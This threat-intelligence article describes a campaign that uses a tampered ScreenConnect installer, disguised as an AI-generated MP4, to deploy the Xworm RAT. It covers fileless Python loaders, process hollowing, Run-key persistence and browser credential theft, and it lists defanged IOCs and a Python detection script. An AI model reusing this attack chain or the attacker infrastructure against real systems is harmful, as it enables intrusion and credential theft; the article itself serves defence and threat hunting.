Weaponized ScreenConnect RMM Tool Deceives Users into Installing Xworm RAT

The SpiderLabs Threat Hunt Team recently discovered a cyber campaign in which threat actors used the genuine ScreenConnect remote management application as a weapon to spread the Xworm Remote Access Trojan (RAT) through a multi-phase infection chain.

The attack begins with social engineering tactics, including phishing, malvertising, and deceptive social media posts, luring users to fake AI-themed websites like gptgrok[.]ai, which redirects to suspicious domains such as anhemvn6[.]com.

Victims are tricked into downloading a disguised installer masquerading as an MP4 file, such as “Creation_Made_By_GrokAI.mp4 Grok.com,” which is actually the ScreenConnect.ClientSetup.msi binary.

Analysis reveals that the attackers tampered with the installer's Authenticode signature, embedding their malicious client configuration inside the otherwise legitimate digital signature. The modified binary therefore still appears validly signed, which lets it drop and execute from the Temp directory without raising endpoint detection and response (EDR) alerts.

Pre-configured to run hidden, the client establishes a remote session to attacker-controlled servers like instance-keoxeq-relay[.]screenconnect[.]com using parameters such as “?e=Access&y=Guest&h=instance-keoxeq-relay[.]screenconnect[.]com&p=443&s=44f&k=BgIAAA&c=GROKgpt,” enabling stealthy remote access without user-visible indicators like icons or tray notifications.

Figure: Modified ScreenConnect installer.

Execution Chain Involves Fileless Payloads

Once remote access is secured, the campaign progresses to execution via a dropped batch file, “X-META Firebase_crypted.bat,” which invokes mshta.exe to run obfuscated scripts.

This leads to cmd.exe downloading and extracting a ZIP archive, “5btc.zip,” from anhemvn4[.]com, creating an “xmetavip” folder on the C: drive.

Figure: Parameters for the remote session controlled by the threat actor.

Within this folder, a renamed copy of pythonw.exe (pw.exe) executes Base64-encoded commands that fetch and run obfuscated Python code from a GitHub repository at github[.]com/trieule99911/vianhthuongbtc, including files such as “basse64.txt.”

This fileless approach evades static detection, facilitating process injection into legitimate browsers like chrome.exe and msedge.exe using process hollowing (T1055.012) on a hidden desktop (T1564.003).

Persistence is established via registry run keys (T1547.001): the malware adds a value to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run named to mimic a system component, such as “Windows Security,” so that “backup.bat” auto-executes at login and re-runs similar encoded Python commands from GitHub files like “buquabua.txt.”
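As an added example (not code from the SpiderLabs report), the following Python script turns the behaviours described above into triage checks over process-creation and registry telemetry: it parses the ScreenConnect relay parameters and compares the relay host against an allowlist, flags mshta.exe or cmd.exe children of the ScreenConnect client, a renamed pythonw.exe, and Run-key values that launch batch files. The event schema, the allowlist and the parent-process name are assumptions; the sample events are constructed from the report's indicators.

```python
import re
from urllib.parse import parse_qs

# Hypothetical allowlist: relay hosts of the organisation's own ScreenConnect instances.
KNOWN_RELAYS = {"instance-corpit-relay.screenconnect.com"}

def refang(s):
    """Undo common IOC defanging so the same logic works on report text and raw telemetry."""
    return s.replace("[.]", ".").replace("hxxp", "http")

def parse_sc_params(cmdline):
    """Pull the ScreenConnect client query string (e, y, h, p, s, k, c) out of a command line."""
    m = re.search(r"\?e=[^\s\"']+", refang(cmdline))
    if not m:
        return None
    return {k: v[0] for k, v in parse_qs(m.group(0)[1:]).items()}

def check_event(ev):
    """Return the findings for one event dict (an empty list means nothing suspicious)."""
    findings = []
    if ev["type"] == "process":
        image = ev["image"].lower()
        params = parse_sc_params(ev["cmdline"])
        if params and params.get("h", "").lower() not in KNOWN_RELAYS:
            findings.append(f"ScreenConnect session to unknown relay {params.get('h')} (c={params.get('c')})")
        # Assumed parent name: the report does not state which ScreenConnect process launched the batch file.
        if "screenconnect" in ev.get("parent", "").lower() and image.endswith(("mshta.exe", "cmd.exe")):
            findings.append(f"{image} spawned by the ScreenConnect client")
        if ev.get("original_name", "").lower() == "pythonw.exe" and not image.endswith("pythonw.exe"):
            findings.append(f"renamed pythonw.exe running as {image}")
    elif ev["type"] == "registry":
        if ev["key"].lower().endswith(r"\software\microsoft\windows\currentversion\run") \
                and ev["data"].lower().endswith(".bat"):
            findings.append(f"Run value '{ev['value']}' launches a batch file: {ev['data']}")
    return findings

# Constructed sample events modelled on the behaviours in the report (paths and parents assumed).
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Users\u\AppData\Local\Temp\ScreenConnect.WindowsClient.exe", "parent": "msiexec.exe",
     "cmdline": '"ScreenConnect.WindowsClient.exe" "?e=Access&y=Guest&h=instance-keoxeq-relay[.]screenconnect[.]com&p=443&s=44f&k=BgIAAA&c=GROKgpt"'},
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe", "parent": "ScreenConnect.ClientService.exe",
     "cmdline": "mshta.exe <obfuscated script placeholder>"},
    {"type": "process", "image": r"C:\xmetavip\pw.exe", "parent": "cmd.exe", "original_name": "pythonw.exe",
     "cmdline": "pw.exe -c <base64 placeholder>"},
    {"type": "registry", "key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "Windows Security", "data": r"C:\xmetavip\backup.bat"},
]

def triage(events):
    """Run every check over a list of events and return (event index, finding) pairs."""
    return [(i, f) for i, ev in enumerate(events) for f in check_event(ev)]

if __name__ == "__main__":
    for i, f in triage(SAMPLE_EVENTS):
        print(i, f)
```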

Imperative of Human-Led Threat Hunting

Further analysis shows credential access attempts (T1555.003) targeting browser files in Google Chrome, Microsoft Edge, and Mozilla Firefox, alongside discovery via WMI queries for OS details (T1082) and antivirus software (T1518.001).

The GitHub repository, created just a week before the attacks, hosts 11 obfuscated, Base64-encoded Python files divided into persistence creators and complex payloads attributed to Xworm RAT, a malware-as-a-service offering.

One file, “Exppiyt.txt,” reveals a command-and-control (C2) IP: 5[.]181[.]165[.]102:7705, undetected on VirusTotal at analysis time.

This campaign highlights how adversaries exploit AI branding to make their social engineering more effective, and how hidden behaviors let them bypass EDR; uncovering the activity required manual timeline reviews in tools like Defender.

SpiderLabs emphasizes the limitations of automated detection, underscoring the value of proactive threat hunting to identify such evasive threats, combining human expertise with investigative rigor to mitigate risks in evolving cyber landscapes.

Indicators of Compromise (IOCs)

Type    Indicator
URL     hxxps://gptgrok[.]ai
URL     hxxps://anhemvn6[.]com
URL     hxxps://anhemvn4[.]com/5btc[.]zip
URL     hxxps://github[.]com/trieule99911/vianhthuongbtc (and the associated raw.githubusercontent[.]com file paths for basse64.txt, backpuppure.txt, etc.)
C2 IP   5[.]181[.]165[.]102:7705

About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.